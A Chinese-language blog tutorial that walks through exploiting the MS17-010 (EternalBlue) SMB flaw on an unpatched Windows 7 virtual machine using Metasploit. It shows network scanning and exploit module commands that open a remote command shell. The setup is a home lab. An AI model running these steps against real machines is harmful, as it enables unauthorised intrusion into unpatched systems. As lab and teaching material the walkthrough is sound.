使用 msfconsole 的 ms17-010 對Windows7 進行滲透

2017 年橫卷網絡的勒索軟件,就是利用了 Windows7 的SMB漏洞,進行傳播.

惡意代碼會掃描開放445文件共享端口的Windows機器,無需用戶任何操作,只要開機上網,不法分子就能在電腦和服務器中植入勒索軟件、遠程控制木馬、虛擬貨幣挖礦機等惡意程序。


使用 msfconsole 的 ms17-010 對Windows7 進行滲透

以上所說,只是為了提高一下這個 MS17-010 的知名度.

現在利用msfconsole 進行滲透已經是輕車熟路,老生常談. 但如果你的電腦還沒打補丁,還是打上為好,畢竟安全第一.

環境搭建

使用 virtualbox 或者 VMware workstation 分別安裝 Kali Linux 和 Windows7 sp1 (原版是沒補丁的),橋接網絡,便於通信.

筆者的環境是 virtualbox , black arch 和 Windows7 . Windows7得開一下共享,默認是開放445端口的.

blackarch : 192.168.2.106

Windows7 : 192.168.2.107

掃描系統

啟動系統

blackarch 默認登錄用戶名 root , 密碼 blackarch .

Windows7 開啟共享,這樣才會開放445端口.

在 blackarch 中 輸入 msfconsole 啟動.


掃描漏洞主機

msf5> search ms17_010


使用 msfconsole 的 ms17-010 對Windows7 進行滲透

msf5 > use auxiliary/scanner/smb/smb_ms17_010

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options


使用 msfconsole 的 ms17-010 對Windows7 進行滲透

可以看到, RHOST 是必須設置的, THREADS 也是必須設置,但是有默認值1了.

msf5 auxiliary(scanner/smb/smb_ms17_010) >set rhosts 192.168.2.0/24

msf5 auxiliary(scanner/smb/smb_ms17_010) >set threads 12

msf5 auxiliary(scanner/smb/smb_ms17_010) >run

此處 rhosts 是掃面整個網段, 如果知道目標主機IP 可以使用 IP 直接代替. 例如筆者的是 192.168.2.107.

設置 threads 線程數,可以影響掃描速度. 掃描結果如圖:


使用 msfconsole 的 ms17-010 對Windows7 進行滲透

出現紅色描畫部分,就說明該主機可能存在漏洞.

滲透攻擊

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options


使用 msfconsole 的 ms17-010 對Windows7 進行滲透

可以看到, rhosts 是必須設置的,且默認為空.

msf5 exploit(windows/smb/ms17_010_eternalblue) >set rhosts 192.168.2.107

msf5 exploit(windows/smb/ms17_010_eternalblue) >run


使用 msfconsole 的 ms17-010 對Windows7 進行滲透

當出現 "command shell session 1 opened" 出現,已經說明滲透成功了.

如果此時還沒出現 session ,直接輸入 job + 回車 ,即可進入shell.


使用 msfconsole 的 ms17-010 對Windows7 進行滲透

補充

  1. 默認安裝的Windows7是關閉smb共享的,此時是無法滲透成功的.
  2. 目標主機是Windows7 簡體中文版,所以終端會話是亂碼狀態,修改一下終端的編碼為 GBK 編碼即可.


分享到:


相關文章: